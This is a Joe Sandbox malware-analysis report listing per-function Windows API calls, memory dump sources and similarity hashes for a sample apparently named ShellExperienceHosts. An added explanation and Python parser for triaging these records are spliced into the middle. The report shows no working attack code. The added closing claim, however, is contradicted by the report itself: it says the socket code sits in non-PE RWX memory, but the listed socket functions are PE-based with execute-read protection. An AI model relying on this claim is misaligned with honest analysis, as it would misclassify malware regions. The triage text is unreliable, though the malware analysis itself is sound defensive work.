                                                                            • SetLastError.KERNEL32(00000000), ref: 10003621
                                                                            • GetLastError.KERNEL32 ref: 10003639
                                                                              • Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                              • Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                              • Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
                                                                              • Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                              • Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
                                                                              • Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                              • Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025
                                                                            • SetLastError.KERNEL32(00000000), ref: 10003649
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                            • String ID:
                                                                            • API String ID: 127459856-0
                                                                            • Opcode ID: 27567248ad9cb40579700c88c4b0573dbe1feeef2cc9a6d62e2a760125df68bb
                                                                            • Instruction ID: 683d4fe1a0db9e8cd201fdded36c2c75d02b426da01d37e97b5f8f569f7a2aba
                                                                            • Opcode Fuzzy Hash: 27567248ad9cb40579700c88c4b0573dbe1feeef2cc9a6d62e2a760125df68bb
                                                                            • Instruction Fuzzy Hash: 8041AFB5600704AFE360EF69CC81B9BB7E8FB48341F50882EE646D7690D7B1F8448B90
                                                                            APIs
                                                                            • ResetEvent.KERNEL32(?), ref: 10004443
                                                                            • ResetEvent.KERNEL32(?), ref: 1000444C
                                                                            • timeGetTime.WINMM ref: 1000444E
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 1000445D
                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 100044AB
                                                                            • ResetEvent.KERNEL32(?), ref: 100044C8
                                                                              • Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                              • Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                              • Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
                                                                              • Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                              • Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
                                                                              • Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                              • Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025
                                                                            • ResetEvent.KERNEL32(?), ref: 100044DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                            • String ID:
                                                                            • API String ID: 542259498-0
                                                                            • Opcode ID: f834a32b78aad868db6c3b299e2b280971fbcefdd6bd4d0406109023f8606c47
                                                                            • Instruction ID: e23a36aee9568f488b14e02ccbdce45cc04d01c91958f2c1d86c028973892dd3
                                                                            • Opcode Fuzzy Hash: f834a32b78aad868db6c3b299e2b280971fbcefdd6bd4d0406109023f8606c47
                                                                            • Instruction Fuzzy Hash: 592173B6640704ABD220EF79DC85B97B3E8FF89751F104A1EF58AC7654DA71F8008BA4
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Cursor$ClientEmptyScreen
                                                                            • String ID:
                                                                            • API String ID: 78079831-0
                                                                            • Opcode ID: 7ca2e2d6228d76b70cf67e42e4f6c8f3ee57d370f6e1b15ab1721cf70f2afa67
                                                                            • Instruction ID: 89e42f069d771b7982e7b91eb9724dd43466f727955413f989157e8ddb570401
                                                                            • Opcode Fuzzy Hash: 7ca2e2d6228d76b70cf67e42e4f6c8f3ee57d370f6e1b15ab1721cf70f2afa67
                                                                            • Instruction Fuzzy Hash: 3A213C72A0520AFFDF519FA0C9489EEBBB8FB0A349F14047DE156D3910E730A945DBA1
                                                                            APIs
                                                                            • SetLastError.KERNEL32(0000139F,?), ref: 10004E79
                                                                            • TryEnterCriticalSection.KERNEL32(?,?), ref: 10004E98
                                                                            • TryEnterCriticalSection.KERNEL32(?), ref: 10004EA2
                                                                            • SetLastError.KERNEL32(0000139F), ref: 10004EB9
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10004EC2
                                                                            • LeaveCriticalSection.KERNEL32(00000002), ref: 10004EC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                            • String ID:
                                                                            • API String ID: 4082018349-0
                                                                            • Opcode ID: 6720494b42b4f7a77260b90f8de04f87c6be7c2df52100a175db74c353f41269
                                                                            • Instruction ID: b6eaa0d5c2d22c0db505b760e803bdb0fa2ef48d94b0f961ed90457994499652
                                                                            • Opcode Fuzzy Hash: 6720494b42b4f7a77260b90f8de04f87c6be7c2df52100a175db74c353f41269
                                                                            • Instruction Fuzzy Hash: 36118272700354DBE320DBB9DC85A6BB3ECFB88392B41063EE645C7550DA72E804CBA5
                                                                            APIs
                                                                            • FillRect.USER32(56010845,?,?), ref: 6C7D6F86
                                                                            • FillRect.USER32(?,?,?), ref: 6C7D6FED
                                                                            • FillRect.USER32(?,?,?), ref: 6C7D7090
                                                                              • Part of subcall function 6C6E1F09: __EH_prolog3.LIBCMT ref: 6C6E1F10
                                                                              • Part of subcall function 6C6E1F09: CreateSolidBrush.GDI32(00000000), ref: 6C6E1F2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: FillRect$BrushCreateH_prolog3Solid
                                                                            • String ID: B7}l
                                                                            • API String ID: 1242064992-4024997495
                                                                            • Opcode ID: d36385a95d5ada4627ae5519e00854b9ae866c338dd0ef7514837d7eebebe1e9
                                                                            • Instruction ID: 0277f874883a5ef76ea4432f4fcb8b9e831650cf94e3ed192f81feb4f8bff806
                                                                            • Opcode Fuzzy Hash: d36385a95d5ada4627ae5519e00854b9ae866c338dd0ef7514837d7eebebe1e9
                                                                            • Instruction Fuzzy Hash: 3CA13171A00119DFCF08CF95CA959EDBBB6FF49304F15812EE906AB694D731EA05CB90
                                                                            APIs
                                                                              • Part of subcall function 6C7226DF: GdipGetImagePixelFormat.GDIPLUS(?,6C8F1F5C,00000000,00000000,?,6C722887,05BCD017,00000000,00000000,6C8F1F5C), ref: 6C7226ED
                                                                              • Part of subcall function 6C722723: GdipGetImagePalette.GDIPLUS(?,00000000,00000000,?,?,6C7229A6,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,05BCD017), ref: 6C722732
                                                                            • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,05BCD017,00000000,00000000,6C8F1F5C), ref: 6C722A9B
                                                                            • GdipBitmapUnlockBits.GDIPLUS(?,00000000,?,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,05BCD017,00000000,00000000), ref: 6C722B4B
                                                                            • GdipDrawImageI.GDIPLUS(?,00000000,00000000,00000000,?,?,00000082,?,00022009,?,00000000,00000000,?,00000000,00000000,00000000), ref: 6C722B9D
                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,00000000,00000000,00000000,?,?,00000082,?,00022009,?,00000000,00000000,?,00000000,00000000), ref: 6C722BA8
                                                                            • GdipDisposeImage.GDIPLUS(?,?,?,00000000,00000000,00000000,?,?,00000082,?,00022009,?,00000000,00000000,?,00000000), ref: 6C722BB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$Image$BitmapBits$DeleteDisposeDrawFormatGraphicsLockPalettePixelUnlock
                                                                            • String ID: &$ &
                                                                            • API String ID: 1665940520-360661826
                                                                            • Opcode ID: c6c3e6a1564bc7623d03a954179e8d1db2c223f311057ffaab4b2fe185ef6e9e
                                                                            • Instruction ID: fed2adbdeda3cdf62f6d3867c72e0921b6ad02994ee2b7e73dac489749bad245
                                                                            • Opcode Fuzzy Hash: c6c3e6a1564bc7623d03a954179e8d1db2c223f311057ffaab4b2fe185ef6e9e
                                                                            • Instruction Fuzzy Hash: 08A18FB19111299BCB248F14C984AE9B7B5FF48328F5045E9EA08A7B01D734DE85CF98
                                                                            APIs
                                                                            • __EH_prolog3_catch.LIBCMT ref: 6C7189E0
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                            • IsWindow.USER32(?), ref: 6C718B13
                                                                              • Part of subcall function 6C770A0E: GetDlgCtrlID.USER32(?), ref: 6C770A19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CtrlH_prolog3H_prolog3_catchWindow
                                                                            • String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars$Name
                                                                            • API String ID: 1537839037-190999575
                                                                            • Opcode ID: ab83e913d882a4a4cca73385fc8616040f59d90ea9a478c7282acf9571891203
                                                                            • Instruction ID: 7673d22812f80546926c2c0ae4ddabbbfdb828416900685aa52413afe7da8352
                                                                            • Opcode Fuzzy Hash: ab83e913d882a4a4cca73385fc8616040f59d90ea9a478c7282acf9571891203
                                                                            • Instruction Fuzzy Hash: 70718D70A00219EFDF15CBA4CA58EEDBBB5AF49318F1441A9E811B7B90DB309E04DB65
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3509494761-0
                                                                            • Opcode ID: 5bfa4756ee80c5efe324d73c8a9700d1fab09b882e46c43547fb5e5e9682fa6d
                                                                            • Instruction ID: 3f9247136b60763c1361603e20f855c4a3ac9b5646ee41110e5a436ecfb84d6d
                                                                            • Opcode Fuzzy Hash: 5bfa4756ee80c5efe324d73c8a9700d1fab09b882e46c43547fb5e5e9682fa6d
                                                                            • Instruction Fuzzy Hash: CF51AB707002159FDF119F20C999BBA3BB5AF49309F4401B8EC1AAF695CF31AD09CBA1
                                                                            APIs
                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 6C7EAFCE
                                                                              • Part of subcall function 6C6E2C90: __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                              • Part of subcall function 6C6E2C90: GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C7EB00E
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C7EB030
                                                                              • Part of subcall function 6C6E2A7E: SelectObject.GDI32(?,!+nl), ref: 6C6E2A87
                                                                            • FillRect.USER32(?,?,?), ref: 6C7EB07A
                                                                            • OpenClipboard.USER32(?), ref: 6C7EB0AA
                                                                            • EmptyClipboard.USER32 ref: 6C7EB0E8
                                                                            • SetClipboardData.USER32(00000002,00000000), ref: 6C7EB10C
                                                                            • CloseClipboard.USER32 ref: 6C7EB126
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$CompatibleCreate$BitmapCloseDataEmptyFillH_prolog3H_prolog3_catch_ObjectOpenRectSelectWindow
                                                                            • String ID:
                                                                            • API String ID: 2940850299-0
                                                                            • Opcode ID: 310d4c61ecb4ac3ec868aa3c39b051d0680cd65465354eaca646c02450afbec4
                                                                            • Instruction ID: 532a5766ccedce4b3bda921cc9d5bc1569fe3d428d4cfd0f62c0f3e936a6f12a
                                                                            • Opcode Fuzzy Hash: 310d4c61ecb4ac3ec868aa3c39b051d0680cd65465354eaca646c02450afbec4
                                                                            • Instruction Fuzzy Hash: D4416271905119EBDB10DBE8CA48ADDBB79AF0E318F104125E511B3690DB30AE09CBAC
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C724BD2
                                                                              • Part of subcall function 6C6E2C90: __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                              • Part of subcall function 6C6E2C90: GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            • CreateCompatibleDC.GDI32(?), ref: 6C724C22
                                                                            • CreateCompatibleDC.GDI32(?), ref: 6C724C34
                                                                            • SelectObject.GDI32(?,?), ref: 6C724C51
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724C69
                                                                            • BitBlt.GDI32(?,?,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C724C8F
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724C9D
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724CAB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$CompatibleCreateH_prolog3$Window
                                                                            • String ID:
                                                                            • API String ID: 1662780096-0
                                                                            • Opcode ID: 83fddf001cc64aac4fba9d011abb21b0897462951bc5ff8f2428f96e8324d01e
                                                                            • Instruction ID: f962344e627ffc9b12e4a09be87b28dee63ae01b8d8fb2a3661c1d32789d9a60
                                                                            • Opcode Fuzzy Hash: 83fddf001cc64aac4fba9d011abb21b0897462951bc5ff8f2428f96e8324d01e
                                                                            • Instruction Fuzzy Hash: 1B319031902115EFDF15DFA4CE49AEDBBB5FF19308F104029E50163A50CB74AE19DBA4
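                                                                            The blocks above are Joe Sandbox's per-function records: the API calls resolved inside one function (with "Part of subcall function" entries for callees), the memory dump the function was lifted from, and the API/Opcode/Instruction hashes the sandbox uses to cluster functions across samples. Reading hundreds of these by hand is slow, so the Python below, added here as a worked example and not part of the Joe Sandbox report or of the analysed sample, parses a condensed copy of two blocks from this page (the critical-section function in the 10000000 module and the clipboard function in the 6C6B0000 module), decodes the region address and protection from the .sdmp name, and tags each function with the capability its API set implies (bitmap to clipboard, since SetClipboardData's first argument 00000002 is CF_BITMAP; window capture via GetWindowDC plus CreateCompatibleBitmap or BitBlt; socket teardown; locking). Two things are assumptions, not Joe Sandbox definitions: the position of the protection field in the dump name (the fifth dot-separated field, whose values on this page, 02/04/08/20/40, coincide with the Win32 PAGE_* constants) and the capability rules, which are a triage heuristic. The 6C6B0000 module carries MFC toolbar strings on this page, so capability hits there are library code; the based-on-PE flag and the region protection are what separate such hits from code in an unpacked stage.

```python
"""Parse Joe Sandbox function-similarity blocks into triage records.

Added example; not part of the Joe Sandbox report or of the analysed sample.
EXCERPT is a condensed copy of two blocks from the report page.
"""
import re
from dataclasses import dataclass, field

EXCERPT = """\
APIs
• SetLastError.KERNEL32(0000139F,?), ref: 10004E79
• TryEnterCriticalSection.KERNEL32(?,?), ref: 10004E98
• LeaveCriticalSection.KERNEL32(?), ref: 10004EC2
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Similarity
• API ID: CriticalSection$EnterErrorLastLeave
• Opcode ID: 6720494b42b4f7a77260b90f8de04f87c6be7c2df52100a175db74c353f41269
APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 6C7EAFCE
  • Part of subcall function 6C6E2C90: GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
• CreateCompatibleDC.GDI32(00000000), ref: 6C7EB00E
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C7EB030
• OpenClipboard.USER32(?), ref: 6C7EB0AA
• EmptyClipboard.USER32 ref: 6C7EB0E8
• SetClipboardData.USER32(00000002,00000000), ref: 6C7EB10C
• CloseClipboard.USER32 ref: 6C7EB126
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
Similarity
• API ID: Clipboard$CompatibleCreate$BitmapCloseDataEmptyFillH_prolog3H_prolog3_catch_ObjectOpenRectSelectWindow
• Opcode ID: 310d4c61ecb4ac3ec868aa3c39b051d0680cd65465354eaca646c02450afbec4
"""

# "• Name.MODULE(args), ref: ADDR"; args and the comma are optional, e.g. "EmptyClipboard.USER32 ref: ..."
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
SRC_RE = re.compile(
    r"Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)"
)
# Win32 memory protection constants (winnt.h); the dump name carries one of these.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
CF_BITMAP = "00000002"  # clipboard format 2, as printed in the report's argument list


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str
    is_subcall: bool


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    dump: str = ""
    module_base: str = ""
    based_on_pe: bool = False
    api_id: str = ""
    opcode_id: str = ""


def parse_blocks(text):
    """Split report text into FunctionBlock records; every "APIs" heading starts a new one."""
    blocks, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        if m := API_RE.match(line):
            args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], bool(m["sub"])))
        elif m := SRC_RE.search(line):
            cur.dump, cur.module_base, cur.based_on_pe = m["dump"], m["offset"], m["pe"] == "true"
        elif s.startswith("• API ID:"):
            cur.api_id = s.split(":", 1)[1].strip()
        elif s.startswith("• Opcode ID:"):
            cur.opcode_id = s.split(":", 1)[1].strip()
    return blocks


def dump_region(dump_name):
    """Return (region_address, protection) from a .sdmp name.

    Assumption: field 4 is the region base and field 5 its PAGE_* protection; this matches
    the values seen in the report but is not a documented Joe Sandbox contract.
    """
    fields = dump_name.split(".")
    return int(fields[3], 16), int(fields[4], 16)


def capabilities(block):
    """Heuristic capability tags derived from the resolved API set (triage aid, not ground truth)."""
    names = {a.name for a in block.apis}
    caps = set()
    if {"OpenClipboard", "SetClipboardData"} <= names:
        fmt = next((a.args[0] for a in block.apis if a.name == "SetClipboardData" and a.args), None)
        caps.add("clipboard-write:CF_BITMAP" if fmt == CF_BITMAP else "clipboard-write")
    if "GetWindowDC" in names and ({"CreateCompatibleBitmap", "BitBlt"} & names):
        caps.add("window-capture")
    if {"EnterCriticalSection", "TryEnterCriticalSection", "LeaveCriticalSection"} & names:
        caps.add("locking")
    if {"shutdown", "closesocket"} <= names:
        caps.add("socket-teardown")
    return caps


def suspicious_region(block):
    """Code outside any PE image in RWX memory is where an unpacked stage usually lives."""
    _, protect = dump_region(block.dump)
    return (not block.based_on_pe) and protect == 0x40


if __name__ == "__main__":
    for b in parse_blocks(EXCERPT):
        addr, prot = dump_region(b.dump)
        print(f"module {b.module_base} region {addr:016X} {PAGE_PROTECT.get(prot, hex(prot))} "
              f"pe={b.based_on_pe} apis={len(b.apis)} caps={sorted(capabilities(b))} "
              f"flag={suspicious_region(b)}")
```

                                                                            Running the script prints one line per function with its module base, region protection, API count and capability tags. Regions that the report marks "based on PE: false" with protection 00000040 (private RWX memory without a PE header) are the ones suspicious_region() flags, and on this page those are where the socket-handling code sits rather than in the MFC module.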
                                                                            APIs
